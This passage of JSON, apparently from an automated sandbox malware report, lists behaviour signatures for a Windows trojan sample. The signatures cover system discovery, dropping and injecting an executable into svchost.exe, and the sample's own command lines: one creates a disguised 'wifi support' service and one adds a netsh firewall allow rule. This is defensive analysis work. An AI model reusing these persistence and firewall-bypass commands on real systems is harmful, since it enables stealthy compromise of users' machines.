"https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004680)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"IsWow64Process\" with parameter \"4680\" - (UID: 00000000-00004680)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004680)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"dqczsfku.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" queries volume information of \"C:\\\" at 00000000-00004680-0000010C-1377643\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" queries volume information of \"C:\\\" at 00000000-00004680-0000010C-1379031\n \"dqczsfku.exe\" queries volume information of \"C:\\\" at 00000000-00005212-0000010C-2059040\n \"dqczsfku.exe\" queries volume information of \"C:\\\" at 00000000-00005212-0000010C-2060538\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002988-0000010C-76181\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002988-0000010C-650724\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002988-0000010C-1295611\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002988-0000010C-1297013", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005184)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c137743790775ffffffff0c0000004c6213771f790775ffffffff0c00000064ec120004000000000400000100000078ec12000a0e1b0000000000 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006b0600000088eaba76ecf91200b3443b6b88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b40005b7ab4bbbcf51200616b400088000000f822410081a8ba76ecf9120000009001002ec20000020000080000003f2e5f00 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb8e76e8332f0000d0fd7f9a5c157700e0fd7fb0c96d0144d0fd7f00000000400000003f0000002500000000d0fd7fa4c96d01c15c157760821c772500000000d0fd7f9a5c157700e0fd7fc8c96d015789147780831c7713170875d8eb8e76 (UID: 00000000-00004680)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000a87e4300dcfa3e00145c1477435c1477a8fb3e000100000094014100010000005cfa3e00935c157740831c77d4a01477370f3b77a8fb3e000100000001000000f0bf4300000000002cfa3e005cfa3e00c8fa3e0095e1107793f11100feffffffd4a014771bbe07750000ac7600000000 (UID: 00000000-00005144)\n \"dqczsfku.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000008af2f00b8fc2400145c1477435c147784fd24000100000094012d000100000038fc2400935c157740831c77d4a01477ac07217784fd24000100000001000000202c30000000000008fc240038fc2400a4fc240095e110776cff1100feffffffd4a014771bbe07750000ac7600000000 (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c137743790775ffffffff0c0000004c6213771f790775ffffffff0c00000064ec120004000000000400000100000078ec12000a0e150000000000 (UID: 00000000-00005212)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005184)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005184)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00002988)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00004680-29967-269-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dqczsfku.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dqczsfku.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"444f78\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"457916\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00004680)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000600000046747b8755a600000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000842dee676033ee670000000000000000\" - (UID: 00000000-00002988)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005184)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00005184)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"dqczsfku.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\VRZJQKMQ\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\dqczsfku.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\dqczsfku.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"dqczsfku.exe.67EE49BD.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"dqczsfku.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\dqczsfku.exe]- [targetUID: 00000000-00004680]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014\" has section name .text with entropy \"6.630102803682182\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014\" has section name .text with entropy \"7.972855291312212\"\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014\" has section name .reloc with entropy \"6.221496050028631\"\n \"dqczsfku.exe\" has section name .text with entropy \"6.630102803682182\"\n \"dqczsfku.exe\" has section name .text with entropy \"7.972855291312212\"\n \"dqczsfku.exe\" has section name .reloc with entropy \"6.221496050028631\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00004680)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00004680)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" (UID: 00000000-00004680)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\vrzjqkmq\\\\\" (UID: 00000000-00004940)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\dqczsfku.exe\" %WINDIR%\\\\system32\\\\vrzjqkmq\\\\\" (UID: 00000000-00003672)\n Spawned process \"sc.exe\" with commandline \"create vrzjqkmq binPath= \"%WINDIR%\\\\system32\\\\vrzjqkmq\\\\dqczsfku.exe /d\\\\\"C:\\\\89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00003344)\n Spawned process \"sc.exe\" with commandline \"description vrzjqkmq \"wifi internet conection\"\" (UID: 00000000-00005028)\n Spawned process \"sc.exe\" with commandline \"start vrzjqkmq\" (UID: 00000000-00005144)\n Spawned process \"dqczsfku.exe\" with commandline \"/d\"C:\\\\89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\"\" (UID: 00000000-00005212)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00005184)\n Spawned process \"svchost.exe\" (UID: 00000000-00002988)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 572)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 572)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 572)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 520)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 520)\n \"89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 520)\n \"dqczsfku.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"dqczsfku.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"dqczsfku.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"dqczsfku.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"dqczsfku.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation 